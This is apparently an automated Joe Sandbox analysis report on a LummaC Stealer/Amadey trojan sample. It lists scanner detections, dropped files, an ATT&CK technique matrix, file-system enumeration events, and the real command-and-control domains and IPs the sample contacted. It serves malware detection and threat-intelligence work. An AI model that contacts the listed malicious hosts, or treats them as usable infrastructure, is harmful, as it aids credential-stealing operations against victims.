Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior

Source: Yara match

File source: Process Memory Space: Climb.com PID: 6996, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Climb.com PID: 6996, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AE2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		14_2_00AE2263
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AE1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		14_2_00AE1C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Access Token Manipulation	12 Software Packing	NTDS	239 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1171 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	561 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	561 Virtualization/Sandbox Evasion	Proc Filesystem	14 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
TNyOrM6mIM.exe	66%	ReversingLabs	Win32.Trojan.Amadey
TNyOrM6mIM.exe	100%	Avira	HEUR/AGEN.1313526
TNyOrM6mIM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\768400\Climb.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\PasoCattle.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Set-up.exe	70%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798	100%	Avira URL Cloud	malware
https://spuriotis.click/.	0%	Avira URL Cloud	safe
https://spuriotis.click/&	0%	Avira URL Cloud	safe
https://spuriotis.click/es&	0%	Avira URL Cloud	safe
https://spuriotis.click/	0%	Avira URL Cloud	safe
https://spuriotis.click/apis	0%	Avira URL Cloud	safe
https://spuriotis.click/apik	0%	Avira URL Cloud	safe
https://spuriotis.click:443/api	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	100%	Avira URL Cloud	malware
https://spuriotis.click/er	0%	Avira URL Cloud	safe
https://spuriotis.click/api	0%	Avira URL Cloud	safe
spuriotis.click	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3	100%	Avira URL Cloud	malware
https://spuriotis.click:443/apiion.txtPK	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
spuriotis.click	104.21.2.51	true	false	high
home.fortth14ht.top	194.87.58.92	true	false	high
httpbin.org	3.218.7.103	true	false	high
yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://spuriotis.click/api	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high
prisonyfork.buzz	false		high
spuriotis.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://duckduckgo.com/chrome_newtab	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000003.00000002.2606819261.0000000000AD9000.00000004.00000001.01000000.00000008.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://www.autoitscript.com/autoit3/	Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798	Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001717000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
https://spuriotis.click/.	Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click/&	Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spuriotis.click/apik	Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click/er	Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://spuriotis.click/es&	Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://spuriotis.click/	Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spuriotis.click/apis	Climb.com, 0000000E.00000002.3576789181.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000000.2417281076.0000000000B35000.00000002.00000001.01000000.0000000A.sdmp, Climb.com.4.dr, Fingers.11.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2344750367.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
https://www.ecosia.org/newtab/	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click:443/api	Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://httpbin.org/ipbefore	TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3	Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://spuriotis.click:443/apiion.txtPK	Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.2.51	spuriotis.click	United States	13335	CLOUDFLARENETUS	false
194.87.58.92	home.fortth14ht.top	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false
3.218.7.103	httpbin.org	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581619
Start date and time:	2024-12-28 09:55:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TNyOrM6mIM.exe renamed because original name is a hash value
Original Sample Name:	ec19fa1027fee164803cc127aef64199.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/22@10/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 6744 because there are no executed function
Execution Graph export aborted for target TNyOrM6mIM.exe, PID 7112 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: TNyOrM6mIM.exe

Simulations

Behavior and APIs

Time	Type	Description
03:56:36	API Interceptor	1x Sleep call for process: PasoCattle.exe modified
03:56:43	API Interceptor	9x Sleep call for process: Climb.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.2.51	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse
104.21.2.51	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
194.87.58.92	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
3.218.7.103	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
spuriotis.click	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
home.fortth14ht.top	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELCOM-ASRelcomGroup19022019RU	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	arm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	mips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	ppc.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	harm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	harm5.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
CLOUDFLARENETUS	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	3LUyRfIoKs.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Tqa1vDp9NT.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	YrWaRb0IKJ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	v5Evrl41VR.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	H1iOI9vWfh.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.66.86
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
AMAZON-AESUS	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	3.218.7.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	3LUyRfIoKs.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	Tqa1vDp9NT.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	YrWaRb0IKJ.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	2S6U7zz1Jg.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	v5Evrl41VR.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	H1iOI9vWfh.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
